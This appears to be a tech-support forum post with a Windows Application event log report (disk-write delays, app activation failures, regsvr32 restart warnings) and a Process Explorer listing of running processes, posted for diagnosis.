Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.
Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.
Context: Application, SystemIndex Catalog
Details:
The system cannot find the file specified. (HRESULT : 0x80070002) (0x80070002)
Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Process CPU Private Bytes Working Set PID Description Company Name
armsvc.exe 1,324 K 4,976 K 2196 Adobe Acrobat Update Service Adobe Systems Incorporated
atieclxx.exe 2,156 K 4,112 K 1132
atiesrxx.exe 920 K 2,340 K 1076 AMD External Events Service Module AMD
audiodg.exe 6,064 K 10,740 K 3708
csrss.exe 1,396 K 3,008 K 440
ctfmon.exe 2,336 K 6,564 K 7876 CTF Loader Microsoft Corporation
DbxSvc.exe 2,384 K 2,568 K 2124 Dropbox Service Dropbox, Inc.
dllhost.exe 1,884 K 8,412 K 1332 COM Surrogate Microsoft Corporation
fontdrvhost.exe 816 K 2,696 K 4780
hpqbam08.exe 1,856 K 8,404 K 5736 HP CUE Alert Popup Window Objects Hewlett-Packard Co.
hpqgpc01.exe 2,860 K 11,224 K 6028 GPCore COM object Hewlett-Packard
hpqste08.exe 4,408 K 11,040 K 5668 HP CUE Status Root Hewlett-Packard Co.
hpwuschd2.exe 1,192 K 5,292 K 5112 hpwuSchd Application Hewlett-Packard
MpCmdRun.exe 3,048 K 9,760 K 5520
mqsvc.exe 3,920 K 5,504 K 2092 Message Queuing Service Microsoft Corporation
MSASCuiL.exe 3,108 K 10,504 K 4648 Windows Defender notification icon Microsoft Corporation
procexp.exe 2,844 K 9,752 K 1892 Sysinternals Process Explorer Sysinternals - www.sysinternals.com
RuntimeBroker.exe 10,124 K 28,808 K 3292 Runtime Broker Microsoft Corporation
SearchUI.exe Suspended 50,108 K 54,292 K 1176 Search and Cortana application Microsoft Corporation
ShellExperienceHost.exe Suspended 37,440 K 45,568 K 3252 Windows Shell Experience Host Microsoft Corporation
sihost.exe 4,508 K 15,664 K 3636 Shell Infrastructure Host Microsoft Corporation
SkypeHost.exe Suspended 4,680 K 13,220 K 6880 Microsoft Skype Preview Microsoft Corporation
smartscreen.exe 11,676 K 24,744 K 3824 SmartScreen Microsoft Corporation
smss.exe 384 K 832 K 340
SMSvcHost.exe 21,148 K 4,028 K 2832 SMSvcHost.exe Microsoft Corporation
spoolsv.exe 7,840 K 10,364 K 1704 Spooler SubSystem App Microsoft Corporation
svchost.exe 2,684 K 5,868 K 4800 Host Process for Windows Services Microsoft Corporation
svchost.exe 2,012 K 3,816 K 1560 Host Process for Windows Services Microsoft Corporation
svchost.exe 2,336 K 3,960 K 2056 Host Process for Windows Services Microsoft Corporation
svchost.exe 1,104 K 2,708 K 2152 Host Process for Windows Services Microsoft Corporation
svchost.exe 3,920 K 4,916 K 2036 Host Process for Windows Services Microsoft Corporation
svchost.exe 8,580 K 20,512 K 2076 Host Process for Windows Services Microsoft Corporation
svchost.exe 4,024 K 5,584 K 1300 Host Process for Windows Services Microsoft Corporation
svchost.exe 6,452 K 19,520 K 3668 Host Process for Windows Services Microsoft Corporation
svchost.exe 8,340 K 15,376 K 1152 Host Process for Windows Services Microsoft Corporation
svchost.exe 14,520 K 15,508 K 1216 Host Process for Windows Services Microsoft Corporation
svchost.exe 20,400 K 17,104 K 1316 Host Process for Windows Services Microsoft Corporation
svchost.exe 5,012 K 10,404 K 2180 Host Process for Windows Services Microsoft Corporation
svchost.exe 5,164 K 10,028 K 840 Host Process for Windows Services Microsoft Corporation
svchost.exe 1,176 K 3,372 K 1580 Host Process for Windows Services Microsoft Corporation
svchost.exe 14,928 K 15,924 K 412 Host Process for Windows Services Microsoft Corporation
SystemSettingsBroker.exe 2,372 K 11,492 K 3704 System Settings Broker Microsoft Corporation
w3wp.exe 4,304 K 9,172 K 4340
wininit.exe 1,036 K 2,484 K 560
winlogon.exe 2,052 K 5,444 K 604
WUDFHost.exe 2,052 K 4,720 K 1120
Memory Compression < 0.01 460 K 108,624 K 2240
svchost.exe < 0.01 5,328 K 14,552 K 1340 Host Process for Windows Services Microsoft Corporation
services.exe < 0.01 3,100 K 4,856 K 676
SASCore64.exe < 0.01 2,032 K 3,464 K 2044
svchost.exe < 0.01 10,104 K 17,160 K 772 Host Process for Windows Services Microsoft Corporation
hpqtra08.exe 0.01 8,908 K 19,144 K 4988 HP Digital Imaging Monitor Hewlett-Packard Co.
explorer.exe 0.01 4,028 K 6,948 K 5132 Windows Explorer Microsoft Corporation
lsass.exe 0.01 5,752 K 10,224 K 684 Local Security Authority Process Microsoft Corporation
regsvr32.exe 0.01 6,096 K 7,456 K 6408 Microsoft© Register Server Microsoft Corporation
Dropbox.exe 0.02 110,760 K 72,388 K 3388 Dropbox Dropbox, Inc.
svchost.exe 0.03 131,164 K 43,496 K 1012 Host Process for Windows Services Microsoft Corporation
SUPERANTISPYWARE.EXE 0.03 16,112 K 5,932 K 4716 SUPERAntiSpyware Application SUPERAntiSpyware
explorer.exe 0.05 40,640 K 82,312 K 3588 Windows Explorer Microsoft Corporation
SearchIndexer.exe 0.06 19,124 K 16,664 K 2416 Microsoft Windows Search Indexer Microsoft Corporation
svchost.exe 0.14 3,308 K 8,784 K 1476 Host Process for Windows Services Microsoft Corporation
csrss.exe 0.31 2,524 K 5,044 K 540
firefox.exe 0.38 172,984 K 153,432 K 4656 Firefox Mozilla Corporation
System Idle Process 0.48 0 K 4 K 0
NisSrv.exe 0.52 27,056 K 21,728 K 3972 Microsoft Network Realtime Inspection Service Microsoft Corporation
taskhostw.exe 0.71 35,496 K 43,296 K 3696 Host Process for Windows Tasks Microsoft Corporation
dwm.exe 1.04 32,128 K 29,864 K 932
svchost.exe 1.14 105,176 K 107,024 K 968 Host Process for Windows Services Microsoft Corporation
Interrupts 1.53 0 K 0 K n/a Hardware Interrupts and DPCs
firefox.exe 1.66 353,072 K 333,192 K 6920 Firefox Mozilla Corporation
regsvr32.exe 1.75 17,504 K 18,632 K 6180 Microsoft© Register Server Microsoft Corporation
procexp64.exe 2.02 18,932 K 48,636 K 8880 Sysinternals Process Explorer Sysinternals - www.sysinternals.com
System 2.07 148 K 9,308 K 4
explorer.exe 4.55 21,424 K 21,176 K 5532 Windows Explorer Microsoft Corporation
MsMpEng.exe 4.92 133,916 K 93,384 K 1496 Antimalware Service Executable Microsoft Corporation
explorer.exe 5.69 25,272 K 58,536 K 8552 Windows Explorer Microsoft Corporation
explorer.exe 9.73 54,148 K 86,580 K 8252 Windows Explorer Microsoft Corporation
regsvr32.exe 26.58 110,496 K 134,556 K 32 Microsoft© Register Server Microsoft Corporation
explorer.exe 34.53 312,520 K 315,520 K 10012 Windows Explorer Microsoft Corporation
Edited by preacherswife, 11 January 2017 - 01:31 PM.